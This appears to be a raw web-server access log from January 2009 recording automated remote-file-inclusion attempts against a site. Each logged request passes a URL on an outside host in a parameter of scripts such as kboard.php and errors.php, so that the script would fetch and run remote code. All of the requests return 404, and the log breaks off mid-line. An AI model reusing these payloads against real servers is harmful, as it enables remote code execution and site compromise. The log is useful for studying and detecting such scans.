94.23.10.29 - - [06/Jan/2009:00:33:52 -0800] "GET /logs/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
94.23.10.29 - - [06/Jan/2009:00:33:52 -0800] "GET /errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
211.43.205.222 - - [06/Jan/2009:00:34:13 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hassenrasool.com/shop/bod.do???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
74.55.128.226 - - [06/Jan/2009:00:34:59 -0800] "GET /logs/access_081218.log//apboard/index.php?APB_rp=http://ubii.freehostia.com/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.spongyfeet.com"
77.221.130.2 - - [06/Jan/2009:00:35:29 -0800] "GET /logs/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.spongyfeet.com"
77.221.130.2 - - [06/Jan/2009:00:35:29 -0800] "GET /errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.spongyfeet.com"
64.38.24.138 - - [06/Jan/2009:00:36:32 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
64.38.24.138 - - [06/Jan/2009:00:36:33 -0800] "GET /kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
64.38.24.138 - - [06/Jan/2009:00:36:33 -0800] "GET /logs//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
94.23.10.29 - - [06/Jan/2009:00:36:40 -0800] "GET /logs/tools/send_reminders.php?includedir=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.spongyfeet.com"
94.23.10.29 - - [06/Jan/2009:00:36:40 -0800] "GET /tools/send_reminders.php?includedir=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.spongyfeet.com"
218.106.254.18 - - [06/Jan/2009:00:37:26 -0800] "GET /kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
218.106.254.18 - - [06/Jan/2009:00:37:26 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
218.106.254.18 - - [06/Jan/2009:00:37:26 -0800] "GET /logs//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
74.200.70.94 - - [06/Jan/2009:00:38:03 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
74.200.70.94 - - [06/Jan/2009:00:38:03 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://prwa-ct.org/calendar_events//tools/pandegaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
218.234.18.127 - - [06/Jan/2009:00:38:17 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hassenrasool.com/shop/bod.do%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
69.72.250.130 - - [06/Jan/2009:00:38:23 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
69.72.250.130 - - [06/Jan/2009:00:38:23 -0800] "GET /logs//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
69.72.250.130 - - [06/Jan/2009:00:38:23 -0800] "GET /kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.spongyfeet.com"
69.72.250.130 - - [06/Jan/2009:00:38:25 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=v...h_mode=&search_word=&cid=//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www